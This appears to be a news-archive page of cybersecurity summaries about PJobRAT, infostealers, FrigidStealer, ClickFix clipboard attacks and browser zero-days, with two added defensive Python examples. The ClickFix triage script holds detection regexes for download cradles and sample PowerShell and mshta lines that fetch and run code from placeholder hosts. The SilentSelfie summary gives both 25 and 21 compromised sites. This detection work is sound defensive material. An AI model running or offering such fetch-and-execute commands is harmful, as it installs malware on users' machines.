compromised websites

AppWizard
March 28, 2025
Recent research from cybersecurity firm Sophos has identified PJobRAT malware targeting users in Taiwan through instant messaging applications named SangaalLite and CChat, which imitate legitimate chat platforms. The malicious apps were hosted for download on several WordPress sites that have since been taken offline. PJobRAT, an Android remote access trojan first identified in 2019, has been used to steal SMS messages, contacts, device information, documents, and media files. The recent cyber-espionage campaign ran for nearly two years and affected only a small number of users, indicating a targeted rather than opportunistic operation. The latest version of PJobRAT drops the ability to steal WhatsApp messages but gives attackers greater control over infected devices. How victims were directed to the download sites remains unclear; previous campaigns relied on third-party app stores and phishing pages. Upon installation, the apps request extensive permissions and provide only basic chat functionality. Sophos researchers note that threat actors often refine their tooling between campaigns, so the risk should be considered ongoing.
AppWizard
March 28, 2025
PJobRAT is an Android Remote Access Trojan (RAT) that re-emerged in 2023 with improved capabilities and a refined targeting strategy; it was previously known for attacking Indian military personnel in 2021. It is now targeting users in Taiwan through social engineering, disguised as legitimate dating and messaging apps. The malware is distributed via compromised WordPress sites hosting fake applications named "SangaalLite" and "CChat." The infection footprint is small, indicating highly targeted attacks rather than a widespread campaign. PJobRAT retains its core functionality of exfiltrating sensitive information, including SMS messages, contacts, and media files, while adding stronger command execution capabilities. Upon installation, the malicious apps request extensive permissions so that they can run continuously in the background. The malware uses a dual-channel communication infrastructure: Firebase Cloud Messaging (FCM) as the primary command channel and a secondary HTTP channel for data exfiltration to a command-and-control server. The campaign appears to have concluded, but the evolution of PJobRAT highlights the ongoing threat of sophisticated mobile malware aimed at high-value individuals.
Tech Optimizer
March 20, 2025
Infostealers are a class of malware that has stolen over a billion credentials, posing significant risks such as identity theft and financial fraud. They reach users through searches for free software, cracked software, game cheats, and activation tools. Cybercriminals use search engine ads, SEO manipulation, social media promotion, and typosquatting to direct users to malicious sites. Once installed, an infostealer can steal saved browser passwords, credit card information, cryptocurrency wallet data, and personal information. To mitigate the risk, individuals should download software only from reputable sources, be wary of offers that look too good to be true, install robust antivirus software, enable ad blockers, verify URLs before clicking, use multi-factor authentication, keep software updated, and educate themselves about current threats. Checking whether an email address or password has already appeared in a breach at www.haveibeenpwned.com is also recommended.
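The password check recommended above can be done without sending the password anywhere: Have I Been Pwned's Pwned Passwords service accepts only the first five hex characters of the SHA-1 hash and returns every matching suffix with a count, so the comparison happens on the client. The following is an added example of that range check, not code from the page or from HIBP; the range response body it parses is constructed inline, the counts are made up, and the live `fetch_range` helper is included only for readers who want to run it against the real endpoint.

```python
"""Offline walkthrough of the Pwned Passwords k-anonymity range check.
Example code added here, not from the page or from HIBP; CONSTRUCTED_RESPONSE
is a fabricated reply, not real API output."""

import hashlib
from typing import Dict, Tuple

HIBP_RANGE_URL = "https://api.pwnedpasswords.com/range/{prefix}"  # real endpoint; not contacted below


def sha1_prefix_suffix(password: str) -> Tuple[str, str]:
    """Split the uppercase SHA-1 hex digest into the 5-char prefix that is sent
    to the service and the 35-char suffix that is matched locally."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def parse_range_response(body: str) -> Dict[str, int]:
    """Parse 'SUFFIX:COUNT' lines. With the Add-Padding header the service mixes
    in zero-count dummy lines; they are kept and simply never report a hit."""
    counts: Dict[str, int] = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, sep, count = line.partition(":")
        if not sep or len(suffix) != 35 or not count.strip().isdigit():
            continue  # ignore malformed lines rather than trusting them
        counts[suffix.upper()] = int(count)
    return counts


def breach_count(password: str, range_body: str) -> int:
    """How many times the password appears in the corpus (0 = not found)."""
    _, suffix = sha1_prefix_suffix(password)
    return parse_range_response(range_body).get(suffix, 0)


def fetch_range(prefix: str, timeout: float = 10.0) -> str:
    """Live lookup of one 5-char prefix; not used by the offline walkthrough."""
    import urllib.request
    req = urllib.request.Request(
        HIBP_RANGE_URL.format(prefix=prefix),
        headers={"User-Agent": "hibp-range-example", "Add-Padding": "true"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8")


# Constructed reply for the prefix of "password123": its real suffix with a
# made-up count, surrounded by two padding-style lines.
_LEAKED = "password123"
_PREFIX, _SUFFIX = sha1_prefix_suffix(_LEAKED)
CONSTRUCTED_RESPONSE = "\r\n".join([
    "0" * 35 + ":0",        # padding entry
    f"{_SUFFIX}:123456",    # the leaked password's suffix
    "F" * 35 + ":0",        # padding entry
])

if __name__ == "__main__":
    print(f"prefix sent to the service: {_PREFIX}")
    print(f"{_LEAKED!r}: seen {breach_count(_LEAKED, CONSTRUCTED_RESPONSE)} times")
    fresh = "correct horse battery staple 2025"
    print(f"{fresh!r}: seen {breach_count(fresh, CONSTRUCTED_RESPONSE)} times")
```

A real deployment would call `fetch_range(prefix)` and pass the body to `breach_count`; a non-zero count means the password should be rotated, and the full hash never leaves the machine.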
Tech Optimizer
March 9, 2025
Mac users have historically believed their computers are immune to viruses and malware, but this notion may be outdated as cyber threats evolve. The rise in popularity of Macs has attracted cybercriminals, leading to the development of sophisticated malware and ransomware specifically targeting Mac operating systems. Phishing attacks have also become more prevalent, using impersonation tactics to extract sensitive information from users. Built-in security features like Gatekeeper and XProtect provide some protection, but experts now recommend considering third-party antivirus solutions for enhanced security, especially when handling private information, downloading from unverified sources, or using Macs in business environments. While some users worry that antivirus programs may slow down their systems, modern options are designed to be more efficient. Ultimately, the decision to use antivirus software depends on individual digital habits and risk tolerance.
Tech Optimizer
March 3, 2025
Recent developments indicate that Mac users are facing an escalating threat from malware designed for macOS systems, particularly with the emergence of a strain called FrigidStealer. This malware spreads through deceptive browser update prompts on compromised websites, leading users to download a malicious DMG file that seeks elevated privileges to steal sensitive information. Cybersecurity firm Proofpoint has traced the operations of FrigidStealer to two threat actors: TA2726, a traffic distribution service provider, and TA2727, which delivers the malware. This campaign also targets Windows and Android devices, indicating a multi-platform strategy. Additionally, the rise of infostealer malware has compromised approximately 330 million credentials in 2024, with around 3.9 billion credentials circulating from infostealer logs. Users are advised to adopt protective measures, including being cautious of fake software updates, enabling two-factor authentication, using password managers, and exercising caution with downloads and links.
Winsage
February 5, 2025
Microsoft will end support for Windows 10 in October 2025, after which newly discovered security vulnerabilities will no longer be patched, increasing exposure to attacks. Cybercriminals are expected to focus on Windows 10, which still holds over 60% market share and is therefore an attractive target. ESET estimates that around 32 million PCs in Germany still run Windows 10. Users can enroll in the paid Extended Security Updates program, which extends updates until October 2026, or rely on the third-party 0patch service, which promises patches until 2030. Windows 10 IoT Enterprise LTSC 2021 will receive updates until 2032, but its licensing restricts its use as an ordinary office PC. Users whose hardware is compatible are encouraged to upgrade to Windows 11 for ongoing security updates and new features.
Tech Optimizer
December 24, 2024
Malicious actors are increasingly using web browsers to deliver malware, bypassing conventional antivirus defenses through social engineering rather than exploits. A notable tactic is to copy a harmful command into the victim's clipboard and then talk the victim into running it. A recent investigation revealed a campaign using malicious advertisements and counterfeit pages that mimic reputable software brands; the pages lead to a fake Cloudflare verification notice that instructs visitors to press specific key combinations. Following the instructions runs PowerShell code that retrieves and installs malware. The investigation began with a suspicious advertisement for a 'notepad' application, which redirected users to a Cloudflare-style page asking them to verify that they are human. Instead of a standard CAPTCHA, users were shown steps that would execute a malicious command: clicking a 'Fix It' button copies the command to the clipboard, and the user is then told to paste and run it, which downloads a payload from a remote domain. The campaign impersonated several brands, including Microsoft Teams, FileZilla, UltraViewer, CutePDF, and Advanced IP Scanner. The domain behind the malicious PowerShell command for Notepad++ also appeared in another campaign. Indicators of compromise include various malicious domains and URLs associated with the malware and its command-and-control server. Malwarebytes provides protection against these threats.
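Because the victim types the pasted command into the Run box themselves, the telemetry signature is a shell (PowerShell, cmd or mshta) spawned by explorer.exe with a download cradle on its command line. The block below is an added example of triaging process-creation records for that pattern; it is not Malwarebytes' detection logic or anything from the page. The pipe-separated "parent|image|commandline" record layout and the four sample records are constructed for illustration, and `example.invalid` is a placeholder, not an indicator from the campaign.

```python
"""Triage process-creation records for the ClickFix clipboard-paste pattern:
a shell launched from the Run box (parent explorer.exe) whose command line
fetches and runs remote content. Example code, not from the page; the
"parent|image|commandline" layout and SAMPLE_EVENTS are constructed."""

import re
from dataclasses import dataclass, field
from typing import List

# Download cradles commonly seen in pasted PowerShell/mshta one-liners.
DOWNLOAD_CRADLES = re.compile(
    r"(\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|downloadstring|"
    r"downloadfile|net\.webclient|start-bitstransfer|\bmshta\b.*https?://|\bcurl\b.*https?://)",
    re.IGNORECASE,
)
# Execution/evasion switches that raise confidence but are not required.
EXEC_HINTS = re.compile(
    r"(\biex\b|invoke-expression|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b)",
    re.IGNORECASE,
)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
RUN_BOX_PARENTS = {"explorer.exe"}  # Win+R launches the command as a child of explorer.exe


@dataclass
class Event:
    parent: str
    image: str
    cmdline: str


@dataclass
class Verdict:
    event: Event
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Require the launch path plus a remote fetch; exec hints alone are too noisy.
        return {"run-box-parent", "shell-image", "download-cradle"} <= set(self.reasons)


def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def parse_event(line: str) -> Event:
    parent, image, cmdline = (p.strip() for p in line.split("|", 2))
    return Event(parent, image, cmdline)


def assess(ev: Event) -> Verdict:
    v = Verdict(ev)
    if basename(ev.parent) in RUN_BOX_PARENTS:
        v.reasons.append("run-box-parent")
    if basename(ev.image) in SHELLS:
        v.reasons.append("shell-image")
    if DOWNLOAD_CRADLES.search(ev.cmdline):
        v.reasons.append("download-cradle")
    if EXEC_HINTS.search(ev.cmdline):
        v.reasons.append("exec-hint")
    return v


def triage(lines: List[str]) -> List[Verdict]:
    return [assess(parse_event(line)) for line in lines if line.strip()]


def flagged(lines: List[str]) -> List[str]:
    return [v.event.cmdline for v in triage(lines) if v.suspicious]


# Constructed sample records (not real telemetry); example.invalid is a placeholder.
SAMPLE_EVENTS = [
    r'C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|'
    r'powershell -w hidden -c "iex (irm https://cdn.example.invalid/captcha)"',
    r"C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\alice\notes.txt",
    r"C:\Windows\System32\svchost.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    r"C:\Windows\explorer.exe|C:\Windows\System32\mshta.exe|mshta https://cdn.example.invalid/verify.hta",
]

if __name__ == "__main__":
    for v in triage(SAMPLE_EVENTS):
        print("SUSPICIOUS" if v.suspicious else "ok        ", v.reasons, "|", v.event.cmdline)
```

The scheduled-task PowerShell record is deliberately left unflagged: its parent is not explorer.exe and it fetches nothing, which is the distinction that keeps this rule quiet on administrative scripting while still catching the pasted Run-box one-liner.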
Winsage
November 27, 2024
In October 2024, Russian hackers were able to execute arbitrary code on the machines of Firefox and Tor Browser users by chaining two zero-day vulnerabilities: CVE-2024-9680 in Mozilla's browser and CVE-2024-49039 in Windows. The first, a use-after-free in Firefox's animation timelines, was rated 9.8 on the CVSS scale and allowed code execution inside the browser; the second enabled privilege escalation through an undocumented remote procedure call (RPC) endpoint in the Windows Task Scheduler service, escaping the browser sandbox. Both vulnerabilities were patched quickly: CVE-2024-9680 on October 9 and CVE-2024-49039 on November 12. Most targets were located in North America and Europe, in particular the Czech Republic, France, Germany, Poland, Spain, Italy, and the US. None of the victims tracked by ESET were compromised via Tor Browser.
AppWizard
September 27, 2024
Researchers uncovered a cyber-espionage campaign dubbed "SilentSelfie" that targeted Kurdish communities through 25 compromised websites serving four variants of malicious JavaScript. Active since late 2022, the campaign relied on watering-hole attacks and a covert Android application disguised as a news app to collect sensitive data, including location and contacts. The attackers employed obfuscation and used the compromised web servers themselves for command-and-control communication. A total of 21 Kurdish websites were affected, primarily linked to "Rojava" and Kurdish political entities. The campaign went undetected for over 18 months; possible links point to Turkish intelligence, Syrian government agencies, and the Kurdistan Regional Government of Iraq. Compromised sites included 'RojNews' and 'YPG Rojava.'